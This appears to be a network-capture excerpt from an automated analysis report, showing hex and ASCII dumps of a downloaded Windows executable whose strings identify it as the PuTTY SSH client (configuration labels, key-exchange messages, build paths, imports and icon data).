2023-10-05 16:48:02 UTC	868	IN	Data Raw: 76 32 21 4c 2e 32 cd 13 3e b4 91 fe 70 36 d9 5c bb 85 97 14 42 fd 1a cc 46 f8 dd 38 e6 d2 87 07 69 17 d1 02 1a fe f1 b5 3e ae ab b9 c3 6f ee 08 1c be 02 00 00 00 00 00 40 aa c2 40 81 d9 77 f8 2c 3d d7 e1 71 98 2f e7 d5 09 63 51 72 dd 19 a8 af 46 5a 2a d6 ce dc 02 2a fe dd 46 ce 8d 24 13 27 ad d2 23 b7 19 bb 04 c4 2b cc 06 b7 ca eb b1 47 dc 4b 09 9d ca 02 dc c5 8e 51 e6 31 80 56 c3 8e a8 58 2f 34 42 1e 04 8b 14 e5 bf fe 13 fc ff 05 0f 79 63 67 fd 36 d5 66 76 50 e1 b9 62 06 00 00 00 61 b0 67 1a 0a 01 d2 c0 e1 05 d0 3b 73 12 db 3f 2e 9f a3 e2 9d b2 61 e2 dc 63 2a bc 04 26 94 9b d5 70 61 96 25 e3 c2 b9 75 0b 14 21 2c 1d 1f 60 6a 13 b8 a2 3b d2 89 73 7d f1 60 df d7 ca c6 2b df 69 06 37 87 b8 24 ed 06 93 66 eb 6e 49 19 6f db 8d 93 75 82 74 5e 36 9a 6e c5 31 b7 Data Ascii: v2!L.2>p6\BF8i>o@@w,=q/cQrFZ*F$'#+GKQ1VX/4Bycg6fvPbag;s?.ac&pa%u!,`j;s}`+i7$fnIout^6n1
2023-10-05 16:48:02 UTC	875	IN	Data Raw: 00 4e 04 00 00 e8 c1 4f 00 4f 04 00 00 4c c2 4f 00 50 04 00 00 d0 c1 4f 00 52 04 00 00 84 c5 4f 00 56 04 00 00 58 c0 4f 00 57 04 00 00 18 c2 4f 00 5a 04 00 00 b0 be 4f 00 65 04 00 00 50 bf 4f 00 6b 04 00 00 9c c1 4f 00 6c 04 00 00 b4 c5 4f 00 81 04 00 00 68 be 4f 00 01 08 00 00 e8 c0 4f 00 04 08 00 00 70 c2 4f 00 07 08 00 00 dc c3 4f 00 09 08 00 00 90 c5 4f 00 0a 08 00 00 14 bf 4f 00 0c 08 00 00 08 c5 4f 00 10 08 00 00 c4 c3 4f 00 13 08 00 00 14 c5 4f 00 14 08 00 00 1c c1 4f 00 16 08 00 00 c0 bf 4f 00 1a 08 00 00 88 b0 4f 00 1d 08 00 00 68 c3 4f 00 2c 08 00 00 70 b4 4f 00 3b 08 00 00 70 c4 4f 00 3e 08 00 00 7c c2 4f 00 43 08 00 00 58 b4 4f 00 6b 08 00 00 5c c5 4f 00 01 0c 00 00 0c c4 4f 00 04 0c 00 00 2c c3 4f 00 07 0c 00 00 0c c0 4f 00 09 0c 00 00 a8 bf Data Ascii: NOOLOPOROVXOWOZOePOkOlOhOOpOOOOOOOOOOhO,pO;pO>\|OCXOk\OO,OO
2023-10-05 16:48:02 UTC	883	IN	Data Raw: 6f 6e 61 6c 20 74 65 78 74 20 64 69 73 70 6c 61 79 00 58 20 61 75 74 68 6f 72 69 74 79 20 66 69 6c 65 20 66 6f 72 20 6c 6f 63 61 6c 20 64 69 73 70 6c 61 79 00 58 31 31 44 69 73 70 6c 61 79 00 63 6f 6e 66 69 67 2d 6e 6f 64 65 6c 61 79 00 54 43 50 4e 6f 44 65 6c 61 79 00 70 75 62 6c 69 63 5f 61 66 66 69 6e 65 5f 79 00 70 75 62 6c 69 63 5f 79 00 4c 69 6e 75 78 00 61 75 78 00 2d 64 65 6d 6f 2d 63 6f 6e 66 69 67 2d 62 6f 78 00 50 75 54 54 59 43 6f 6e 66 69 67 42 6f 78 00 75 6e 69 78 00 64 69 73 70 6c 61 79 20 6e 61 6d 65 20 27 25 73 27 20 68 61 73 20 6e 6f 20 27 3a 6e 75 6d 62 65 72 27 20 73 75 66 66 69 78 00 67 73 73 61 70 69 2d 6b 65 79 65 78 00 4c 6f 63 61 6c 5c 70 75 74 74 79 2d 63 6f 6e 6e 73 68 61 72 65 2d 6d 75 74 65 78 00 4e 54 52 55 20 50 72 69 6d 65 Data Ascii: onal text displayX authority file for local displayX11Displayconfig-nodelayTCPNoDelaypublic_affine_ypublic_yLinuxaux-demo-config-boxPuTTYConfigBoxunixdisplay name '%s' has no ':number' suffixgssapi-keyexLocal\putty-connshare-mutexNTRU Prime
2023-10-05 16:48:02 UTC	891	IN	Data Raw: 76 65 64 20 53 65 73 73 69 6f 6e 73 00 53 61 26 76 65 64 20 53 65 73 73 69 6f 6e 73 00 43 68 61 6e 67 65 20 74 68 65 20 6e 75 6d 62 65 72 20 6f 66 20 72 6f 77 73 20 61 6e 64 20 63 6f 6c 75 6d 6e 73 00 43 6f 6c 75 6d 6e 73 00 63 6f 6e 66 69 67 2d 70 72 6f 78 79 2d 64 6e 73 00 74 72 61 6e 73 00 43 74 72 6c 53 68 69 66 74 49 6e 73 00 49 6e 69 74 43 6f 6d 6d 6f 6e 43 6f 6e 74 72 6f 6c 73 00 50 61 73 74 65 43 6f 6e 74 72 6f 6c 73 00 53 68 61 72 69 6e 67 20 61 6e 20 53 53 48 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 74 77 65 65 6e 20 50 75 54 54 59 20 74 6f 6f 6c 73 00 4c 6f 67 69 6e 20 64 65 74 61 69 6c 73 00 54 65 72 6d 69 6e 61 6c 20 64 65 74 61 69 6c 73 00 43 6f 6e 6e 65 63 74 69 6f 6e 2f 53 53 48 2f 54 75 6e 6e 65 6c 73 00 52 65 70 6c 69 65 73 20 74 6f 20 Data Ascii: ved SessionsSa&ved SessionsChange the number of rows and columnsColumnsconfig-proxy-dnstransCtrlShiftInsInitCommonControlsPasteControlsSharing an SSH connection between PuTTY toolsLogin detailsTerminal detailsConnection/SSH/TunnelsReplies to
2023-10-05 16:48:02 UTC	899	IN	Data Raw: 57 53 41 53 74 61 72 74 75 70 00 55 73 65 72 20 61 62 6f 72 74 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 73 65 74 75 70 00 44 6f 69 6e 67 20 44 69 66 66 69 65 2d 48 65 6c 6c 6d 61 6e 20 6b 65 79 20 65 78 63 68 61 6e 67 65 20 75 73 69 6e 67 20 25 64 2d 62 69 74 20 6d 6f 64 75 6c 75 73 20 61 6e 64 20 68 61 73 68 20 25 73 20 77 69 74 68 20 61 20 73 65 72 76 65 72 2d 73 75 70 70 6c 69 65 64 20 67 72 6f 75 70 00 75 73 69 6e 67 2d 63 6c 65 61 6e 75 70 00 57 53 41 43 6c 65 61 6e 75 70 00 73 75 70 64 75 70 00 53 63 72 6f 6c 6c 4f 6e 44 69 73 70 00 63 6f 6e 66 69 67 2d 61 6c 77 61 79 73 6f 6e 74 6f 70 00 69 6e 65 74 5f 6e 74 6f 70 00 45 6e 73 75 72 65 20 77 69 6e 64 6f 77 20 69 73 20 61 6c 77 61 79 73 20 6f 6e 20 74 6f 70 00 71 6f 70 00 6c 6f 6f 70 00 4c 6f 6f 70 Data Ascii: WSAStartupUser aborted connection setupDoing Diffie-Hellman key exchange using %d-bit modulus and hash %s with a server-supplied groupusing-cleanupWSACleanupsupdupScrollOnDispconfig-alwaysontopinet_ntopEnsure window is always on topqoploopLoop
2023-10-05 16:48:02 UTC	907	IN	Data Raw: 74 65 6d 4d 65 74 72 69 63 73 46 6f 72 44 70 69 00 63 6f 6e 66 69 67 2d 73 73 68 2d 6b 69 00 73 75 70 64 75 70 2d 61 73 63 69 69 00 63 6f 6e 66 69 67 2d 66 65 61 74 75 72 65 73 2d 62 69 64 69 00 44 69 73 61 62 6c 65 42 69 64 69 00 41 72 67 6f 6e 32 69 00 2d 69 00 63 6f 6e 66 69 67 2d 73 73 68 2d 62 75 67 2d 72 73 61 2d 73 68 61 32 2d 63 65 72 74 2d 75 73 65 72 61 75 74 68 00 73 73 68 2d 75 73 65 72 61 75 74 68 00 42 75 67 52 53 41 53 48 41 32 43 65 72 74 55 73 65 72 61 75 74 68 00 63 6f 6e 66 69 67 2d 73 73 68 2d 6e 6f 61 75 74 68 00 63 6f 6e 66 69 67 2d 73 73 68 2d 6e 6f 74 72 69 76 69 61 6c 61 75 74 68 00 63 6f 6e 66 69 67 2d 73 73 68 2d 78 31 31 61 75 74 68 00 63 6f 6e 66 69 67 2d 70 72 6f 78 79 2d 61 75 74 68 00 2d 6e 6f 2d 74 72 69 76 69 61 6c 2d 61 Data Ascii: temMetricsForDpiconfig-ssh-kisupdup-asciiconfig-features-bidiDisableBidiArgon2i-iconfig-ssh-bug-rsa-sha2-cert-userauthssh-userauthBugRSASHA2CertUserauthconfig-ssh-noauthconfig-ssh-notrivialauthconfig-ssh-x11authconfig-proxy-auth-no-trivial-a
2023-10-05 16:48:02 UTC	914	IN	Data Raw: 72 61 6e 73 69 65 6e 74 20 68 6f 73 74 20 6b 65 79 20 63 61 63 68 65 00 41 63 63 65 70 74 69 6e 67 20 63 65 72 74 69 66 69 65 64 20 68 6f 73 74 20 6b 65 79 20 61 6e 79 77 61 79 20 62 61 73 65 64 20 6f 6e 20 63 61 63 68 65 00 66 20 76 61 6c 75 65 20 72 65 63 65 69 76 65 64 20 69 73 20 74 6f 6f 20 6c 61 72 67 65 00 70 6f 72 74 20 6e 75 6d 62 65 72 20 74 6f 6f 20 6c 61 72 67 65 00 50 61 67 65 61 6e 74 20 66 61 69 6c 65 64 20 74 6f 20 61 6e 73 77 65 72 20 63 68 61 6c 6c 65 6e 67 65 00 52 65 63 65 69 76 65 64 20 43 72 79 70 74 6f 43 61 72 64 20 63 68 61 6c 6c 65 6e 67 65 00 52 65 63 65 69 76 65 64 20 54 49 53 20 63 68 61 6c 6c 65 6e 67 65 00 52 65 63 65 69 76 65 64 20 52 53 41 20 63 68 61 6c 6c 65 6e 67 65 00 4f 70 74 69 6f 6e 73 20 63 6f 6e 74 72 6f 6c 6c 69 Data Ascii: ransient host key cacheAccepting certified host key anyway based on cachef value received is too largeport number too largePageant failed to answer challengeReceived CryptoCard challengeReceived TIS challengeReceived RSA challengeOptions controlli
2023-10-05 16:48:02 UTC	922	IN	Data Raw: 25 64 00 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 25 73 20 70 72 6f 78 79 20 61 74 20 25 73 20 70 6f 72 74 20 25 64 00 25 73 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 6f 20 25 73 20 70 6f 72 74 20 25 64 00 43 6f 6e 6e 65 63 74 69 6e 67 20 74 6f 20 25 73 20 70 6f 72 74 20 25 64 00 53 65 72 76 65 72 20 73 65 6e 74 20 63 6f 6d 6d 61 6e 64 20 65 78 69 74 20 73 74 61 74 75 73 20 25 64 00 53 65 73 73 69 6f 6e 20 73 65 6e 74 20 63 6f 6d 6d 61 6e 64 20 65 78 69 74 20 73 74 61 74 75 73 20 25 64 00 55 73 69 6e 67 20 53 53 48 20 70 72 6f 74 6f 63 6f 6c 20 76 65 72 73 69 6f 6e 20 25 64 00 73 69 67 6e 61 6c 20 25 64 00 53 4f 43 4b 53 20 70 72 6f 78 79 20 72 65 73 70 6f 6e 73 65 20 69 6e 63 6c 75 64 65 64 20 75 6e 6b 6e 6f 77 6e 20 61 64 64 72 65 73 73 20 74 79 70 65 20 Data Ascii: %dConnecting to %s proxy at %s port %d%s connection to %s port %dConnecting to %s port %dServer sent command exit status %dSession sent command exit status %dUsing SSH protocol version %dsignal %dSOCKS proxy response included unknown address type
2023-10-05 16:48:02 UTC	930	IN	Data Raw: 46 38 35 41 36 45 31 45 34 43 37 41 42 46 35 41 45 38 43 44 42 30 39 33 33 44 37 31 45 38 43 39 34 45 30 34 41 32 35 36 31 39 44 43 45 45 33 44 32 32 36 31 41 44 32 45 45 36 42 46 31 32 46 46 41 30 36 44 39 38 41 30 38 36 34 44 38 37 36 30 32 37 33 33 45 43 38 36 41 36 34 35 32 31 46 32 42 31 38 31 37 37 42 32 30 30 43 42 42 45 31 31 37 35 37 37 41 36 31 35 44 36 43 37 37 30 39 38 38 43 30 42 41 44 39 34 36 45 32 30 38 45 32 34 46 41 30 37 34 45 35 41 42 33 31 34 33 44 42 35 42 46 43 45 30 46 44 31 30 38 45 34 42 38 32 44 31 32 30 41 39 33 41 44 32 43 41 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 00 30 78 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 46 43 39 30 46 44 41 41 32 32 31 36 38 43 32 33 34 43 34 43 36 36 32 38 42 38 30 44 43 31 43 44 31 32 Data Ascii: F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD12
2023-10-05 16:48:02 UTC	938	IN	Data Raw: 74 20 6b 65 79 20 66 69 6e 67 65 72 70 72 69 6e 74 20 69 73 3a 00 54 68 65 20 6e 65 77 20 25 73 20 6b 65 79 20 66 69 6e 67 65 72 70 72 69 6e 74 20 69 73 3a 00 54 68 65 20 73 65 72 76 65 72 27 73 20 25 73 20 6b 65 79 20 66 69 6e 67 65 72 70 72 69 6e 74 20 69 73 3a 00 41 70 70 6c 69 63 61 74 69 6f 6e 20 6b 65 79 70 61 64 20 73 65 74 74 69 6e 67 73 3a 00 43 68 61 72 61 63 74 65 72 20 63 6c 61 73 73 65 73 3a 00 45 6e 61 62 6c 65 20 65 78 74 72 61 20 6b 65 79 62 6f 61 72 64 20 66 65 61 74 75 72 65 73 3a 00 50 72 65 66 65 72 65 6e 63 65 20 6f 72 64 65 72 20 66 6f 72 20 47 53 53 41 50 49 20 6c 69 62 72 61 72 69 65 73 3a 00 54 68 65 20 68 6f 73 74 20 6b 65 79 20 69 73 20 6e 6f 74 20 63 61 63 68 65 64 20 66 6f 72 20 74 68 69 73 20 73 65 72 76 65 72 3a 00 54 68 65 Data Ascii: t key fingerprint is:The new %s key fingerprint is:The server's %s key fingerprint is:Application keypad settings:Character classes:Enable extra keyboard features:Preference order for GSSAPI libraries:The host key is not cached for this server:The
2023-10-05 16:48:02 UTC	946	IN	Data Raw: 64 20 66 6f 72 20 73 65 72 76 65 72 20 69 73 20 25 73 2c 20 62 65 6c 6f 77 20 77 61 72 6e 69 6e 67 20 74 68 72 65 73 68 6f 6c 64 2e 20 41 62 61 6e 64 6f 6e 69 6e 67 20 70 72 6f 78 79 20 53 53 48 20 63 6f 6e 6e 65 63 74 69 6f 6e 2e 00 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 77 61 73 20 74 72 69 76 69 61 6c 21 20 41 62 61 6e 64 6f 6e 69 6e 67 20 73 65 73 73 69 6f 6e 20 61 73 20 73 70 65 63 69 66 69 65 64 20 69 6e 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 00 25 73 3d 3d 4e 55 4c 4c 20 69 6e 20 74 65 72 6d 69 6e 61 6c 2e 63 0a 6c 69 6e 65 6e 6f 3d 25 64 20 79 3d 25 64 20 77 3d 25 64 20 68 3d 25 64 0a 63 6f 75 6e 74 28 73 63 72 6f 6c 6c 62 61 63 6b 3d 25 70 29 3d 25 64 0a 63 6f 75 6e 74 28 73 63 72 65 65 6e 3d 25 70 29 3d 25 64 0a 63 6f 75 6e 74 28 61 Data Ascii: d for server is %s, below warning threshold. Abandoning proxy SSH connection.Authentication was trivial! Abandoning session as specified in configuration.%s==NULL in terminal.clineno=%d y=%d w=%d h=%dcount(scrollback=%p)=%dcount(screen=%p)=%dcount(a
2023-10-05 16:48:02 UTC	953	IN	Data Raw: 2d 38 38 35 39 2d 37 3a 31 39 38 37 20 28 4c 61 74 69 6e 2f 47 72 65 65 6b 29 00 57 69 6e 31 32 35 33 20 28 47 72 65 65 6b 29 00 49 53 4f 2d 38 38 35 39 2d 31 31 3a 32 30 30 31 20 28 4c 61 74 69 6e 2f 54 68 61 69 29 00 57 69 6e 31 32 35 34 20 28 54 75 72 6b 69 73 68 29 00 49 53 4f 2d 38 38 35 39 2d 39 3a 31 39 39 39 20 28 4c 61 74 69 6e 2d 35 2c 20 54 75 72 6b 69 73 68 29 00 53 65 63 6f 6e 64 73 20 62 65 74 77 65 65 6e 20 6b 65 65 70 61 6c 69 76 65 73 20 28 30 20 74 6f 20 74 75 72 6e 20 6f 66 66 29 00 25 73 20 28 69 6e 61 63 74 69 76 65 29 00 53 49 47 54 45 52 4d 20 28 54 65 72 6d 69 6e 61 74 65 29 00 57 69 6e 31 32 35 38 20 28 56 69 65 74 6e 61 6d 65 73 65 29 00 49 6e 76 61 6c 69 64 20 6b 65 79 20 28 6e 6f 20 6b 65 79 20 74 79 70 65 29 00 49 53 4f 2d 38 Data Ascii: -8859-7:1987 (Latin/Greek)Win1253 (Greek)ISO-8859-11:2001 (Latin/Thai)Win1254 (Turkish)ISO-8859-9:1999 (Latin-5, Turkish)Seconds between keepalives (0 to turn off)%s (inactive)SIGTERM (Terminate)Win1258 (Vietnamese)Invalid key (no key type)ISO-8
2023-10-05 16:48:02 UTC	961	IN	Data Raw: 00 00 00 21 00 73 00 2d 00 3e 00 63 00 6f 00 6d 00 70 00 63 00 74 00 78 00 00 00 21 00 73 00 2d 00 3e 00 64 00 68 00 5f 00 63 00 74 00 78 00 00 00 21 00 73 00 2d 00 3e 00 63 00 72 00 63 00 64 00 61 00 5f 00 63 00 74 00 78 00 00 00 21 00 65 00 78 00 74 00 72 00 61 00 2d 00 3e 00 67 00 65 00 78 00 00 00 73 00 74 00 2d 00 3e 00 69 00 6e 00 64 00 65 00 78 00 20 00 3d 00 3d 00 20 00 68 00 77 00 2d 00 3e 00 69 00 6e 00 64 00 65 00 78 00 00 00 30 00 20 00 3c 00 3d 00 20 00 69 00 6e 00 64 00 65 00 78 00 00 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 73 00 65 00 6c 00 65 00 6e 00 64 00 2e 00 78 00 20 00 3e 00 20 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 63 00 75 00 72 00 73 00 2e 00 78 00 00 00 74 00 65 00 72 00 6d 00 2d 00 3e 00 73 00 65 00 6c 00 73 00 74 00 61 00 72 00 Data Ascii: !s->compctx!s->dh_ctx!s->crcda_ctx!extra->gexst->index == hw->index0 <= indexterm->selend.x > term->curs.xterm->selstar
2023-10-05 16:48:02 UTC	969	IN	Data Raw: 00 66 00 66 00 66 00 62 00 6b 00 39 00 6d 00 79 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 77 00 69 00 6e 00 64 00 6f 00 77 00 73 00 2f 00 6e 00 61 00 6d 00 65 00 64 00 2d 00 70 00 69 00 70 00 65 00 2d 00 63 00 6c 00 69 00 65 00 6e 00 74 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 6d 00 2f 00 2e 00 62 00 75 00 69 00 6c 00 64 00 2f 00 77 00 6f 00 72 00 6b 00 64 00 69 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 66 00 66 00 66 00 62 00 6b 00 39 00 6d 00 79 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 73 00 73 00 68 00 2f 00 6b 00 65 00 78 00 32 00 2d 00 63 00 6c 00 69 00 65 00 6e 00 74 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 6d 00 Data Ascii: fffbk9my/putty/windows/named-pipe-client.c/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/ssh/kex2-client.c/home/simon/mem
2023-10-05 16:48:02 UTC	977	IN	Data Raw: 00 2e 00 62 00 75 00 69 00 6c 00 64 00 2f 00 77 00 6f 00 72 00 6b 00 64 00 69 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 66 00 66 00 66 00 62 00 6b 00 39 00 6d 00 79 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 75 00 74 00 69 00 6c 00 73 00 2f 00 77 00 69 00 6c 00 64 00 63 00 61 00 72 00 64 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 6d 00 2f 00 2e 00 62 00 75 00 69 00 6c 00 64 00 2f 00 77 00 6f 00 72 00 6b 00 64 00 69 00 72 00 73 00 2f 00 62 00 6f 00 62 00 2d 00 66 00 66 00 66 00 62 00 6b 00 39 00 6d 00 79 00 2f 00 70 00 75 00 74 00 74 00 79 00 2f 00 73 00 73 00 68 00 72 00 61 00 6e 00 64 00 2e 00 63 00 00 00 2f 00 68 00 6f 00 6d 00 65 00 2f 00 73 00 69 00 6d 00 6f 00 6e 00 2f 00 6d 00 65 00 Data Ascii: .build/workdirs/bob-fffbk9my/putty/utils/wildcard.c/home/simon/mem/.build/workdirs/bob-fffbk9my/putty/sshrand.c/home/simon/me
2023-10-05 16:48:02 UTC	985	IN	Data Raw: 00 78 00 2d 00 3e 00 77 00 5b 00 30 00 5d 00 20 00 26 00 20 00 31 00 00 00 6d 00 6f 00 64 00 75 00 6c 00 75 00 73 00 2d 00 3e 00 77 00 5b 00 30 00 5d 00 20 00 26 00 20 00 31 00 00 00 62 00 79 00 74 00 65 00 20 00 3d 00 3d 00 20 00 30 00 78 00 46 00 30 00 00 00 6c 00 6f 00 77 00 5f 00 64 00 69 00 67 00 69 00 74 00 20 00 3c 00 20 00 31 00 30 00 00 00 62 00 69 00 74 00 73 00 20 00 3c 00 20 00 30 00 78 00 31 00 30 00 30 00 30 00 30 00 00 00 78 00 20 00 3e 00 20 00 30 00 00 00 78 00 2d 00 3e 00 6e 00 77 00 20 00 3e 00 20 00 30 00 00 00 6d 00 6f 00 64 00 75 00 6c 00 75 00 73 00 2d 00 3e 00 6e 00 77 00 20 00 3e 00 20 00 30 00 00 00 6e 00 62 00 69 00 74 00 73 00 20 00 3e 00 20 00 30 00 00 00 6b 00 65 00 79 00 5f 00 6e 00 75 00 6d 00 62 00 65 00 72 00 20 00 3e 00 Data Ascii: x->w[0] & 1modulus->w[0] & 1byte == 0xF0low_digit < 10bits < 0x10000x > 0x->nw > 0modulus->nw > 0nbits > 0key_number >
2023-10-05 16:48:02 UTC	993	IN	Data Raw: 00 20 00 22 00 54 00 68 00 69 00 73 00 20 00 70 00 61 00 63 00 6b 00 65 00 74 00 20 00 74 00 79 00 70 00 65 00 20 00 73 00 68 00 6f 00 75 00 6c 00 64 00 20 00 6e 00 65 00 76 00 65 00 72 00 20 00 68 00 61 00 76 00 65 00 20 00 63 00 6f 00 6d 00 65 00 20 00 66 00 72 00 6f 00 6d 00 20 00 22 00 20 00 22 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6f 00 6e 00 32 00 2e 00 63 00 22 00 00 00 66 00 61 00 6c 00 73 00 65 00 20 00 26 00 26 00 20 00 22 00 74 00 68 00 69 00 73 00 20 00 63 00 68 00 61 00 6e 00 6e 00 65 00 6c 00 20 00 74 00 79 00 70 00 65 00 20 00 73 00 68 00 6f 00 75 00 6c 00 64 00 20 00 6e 00 65 00 76 00 65 00 72 00 20 00 72 00 65 00 63 00 65 00 69 00 76 00 65 00 20 00 4f 00 50 00 45 00 4e 00 5f 00 43 00 4f 00 4e 00 46 00 49 00 52 00 4d 00 41 00 Data Ascii: "This packet type should never have come from " "connection2.c"false && "this channel type should never receive OPEN_CONFIRMA
2023-10-05 16:48:02 UTC	1000	IN	Data Raw: 00 2d 00 69 00 6e 00 00 00 74 00 61 00 2d 00 69 00 6e 00 00 00 73 00 61 00 2d 00 69 00 6e 00 00 00 70 00 61 00 2d 00 69 00 6e 00 00 00 65 00 73 00 2d 00 68 00 6e 00 00 00 65 00 6e 00 00 00 00 00 7a 00 68 00 2d 00 63 00 6e 00 00 00 6d 00 73 00 2d 00 62 00 6e 00 00 00 67 00 65 00 72 00 6d 00 61 00 6e 00 2d 00 61 00 75 00 73 00 74 00 72 00 69 00 61 00 6e 00 00 00 70 00 6f 00 72 00 74 00 75 00 67 00 75 00 65 00 73 00 65 00 2d 00 62 00 72 00 61 00 7a 00 69 00 6c 00 69 00 61 00 6e 00 00 00 00 00 61 00 75 00 73 00 74 00 72 00 61 00 6c 00 69 00 61 00 6e 00 00 00 00 00 64 00 75 00 74 00 63 00 68 00 2d 00 62 00 65 00 6c 00 67 00 69 00 61 00 6e 00 00 00 66 00 72 00 65 00 6e 00 63 00 68 00 2d 00 62 00 65 00 6c 00 67 00 69 00 61 00 6e 00 00 00 00 00 62 00 65 00 6c 00 Data Ascii: -inta-insa-inpa-ines-hnenzh-cnms-bngerman-austrianportuguese-brazilianaustraliandutch-belgianfrench-belgianbel
2023-10-05 16:48:02 UTC	1008	IN	Data Raw: 00 dd f2 0f 00 78 db 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc db 0f 00 c6 db 0f 00 d6 db 0f 00 f0 db 0f 00 06 dc 0f 00 14 dc 0f 00 2a dc 0f 00 3a dc 0f 00 46 dc 0f 00 5a dc 0f 00 66 dc 0f 00 76 dc 0f 00 88 dc 0f 00 96 dc 0f 00 a4 dc 0f 00 b0 dc 0f 00 ca dc 0f 00 dc dc 0f 00 ee dc 0f 00 fe dc 0f 00 0e dd 0f 00 28 dd 0f 00 3c dd 0f 00 48 dd 0f 00 58 dd 0f 00 66 dd 0f 00 80 dd 0f 00 8c dd 0f 00 9e dd 0f 00 b6 dd 0f 00 ce dd 0f 00 e0 dd 0f 00 f4 dd 0f 00 fe dd 0f 00 0a de 0f 00 16 de 0f 00 28 de 0f 00 34 de 0f 00 44 de 0f 00 54 de 0f 00 62 de 0f 00 6e de 0f 00 7c de 0f 00 90 de 0f 00 9c de 0f 00 ac de 0f 00 bc de 0f 00 c8 de 0f 00 e0 de 0f 00 f2 de 0f 00 00 00 00 00 02 df 0f 00 1e df 0f 00 2e df 0f 00 42 df 0f 00 5c df 0f 00 00 00 Data Ascii: x*:FZfv(<HXf(4DTbn\|.B\
2023-10-05 16:48:02 UTC	1016	IN	Data Raw: 65 72 6d 69 6e 61 74 65 50 72 6f 63 65 73 73 00 00 b8 05 54 6c 73 41 6c 6c 6f 63 00 00 b9 05 54 6c 73 46 72 65 65 00 ba 05 54 6c 73 47 65 74 56 61 6c 75 65 00 bb 05 54 6c 73 53 65 74 56 61 6c 75 65 00 c7 05 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 ca 05 55 6e 6d 61 70 56 69 65 77 4f 66 46 69 6c 65 00 f1 05 57 61 69 74 46 6f 72 53 69 6e 67 6c 65 4f 62 6a 65 63 74 00 f7 05 57 61 69 74 4e 61 6d 65 64 50 69 70 65 41 00 00 18 06 57 69 64 65 43 68 61 72 54 6f 4d 75 6c 74 69 42 79 74 65 00 2b 06 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 2c 06 57 72 69 74 65 46 69 6c 65 00 ac 01 53 68 65 6c 6c 45 78 65 63 75 74 65 41 00 00 00 43 68 6f 6f 73 65 43 6f 6c 6f 72 41 00 00 02 00 43 68 6f 6f 73 65 46 6f 6e 74 41 00 0b 00 47 65 74 4f Data Ascii: erminateProcessTlsAllocTlsFreeTlsGetValueTlsSetValueUnhandledExceptionFilterUnmapViewOfFileWaitForSingleObjectWaitNamedPipeAWideCharToMultiByte+WriteConsoleW,WriteFileShellExecuteAChooseColorAChooseFontAGetO
2023-10-05 16:48:02 UTC	1024	IN	Data Raw: 00 00 00 00 00 00 00 01 00 09 04 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 20 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 30 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00 50 04 Data Ascii: 0@P
2023-10-05 16:48:02 UTC	1032	IN	Data Raw: 70 19 f1 08 70 10 f1 04 70 00 e1 00 70 00 e1 00 70 01 c1 00 70 03 01 ff f0 00 00 ff f0 00 00 00 00 80 00 3f ff 00 00 1f ff 00 00 0f df 00 00 07 8f 00 00 07 07 80 00 06 03 c0 00 04 07 e0 00 08 0f e0 00 30 1f e0 00 20 3f e0 00 00 7f e0 00 00 ff e0 00 01 ff e0 00 03 ff e0 00 00 07 e0 00 00 03 f0 00 00 01 f8 00 00 00 ff c0 00 00 fc 80 00 00 f0 00 00 00 e0 00 00 01 c0 04 00 07 c0 0c 00 07 80 04 00 07 86 04 00 07 ce 0c 00 07 fc 0c 00 07 f8 1c 00 07 f8 3c 00 07 fc fe 00 07 ff ff 00 0f 28 00 00 00 30 00 00 00 60 00 00 00 01 00 01 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 7f ff ff c0 00 00 00 00 7f ff ff e0 00 00 00 00 7f ff 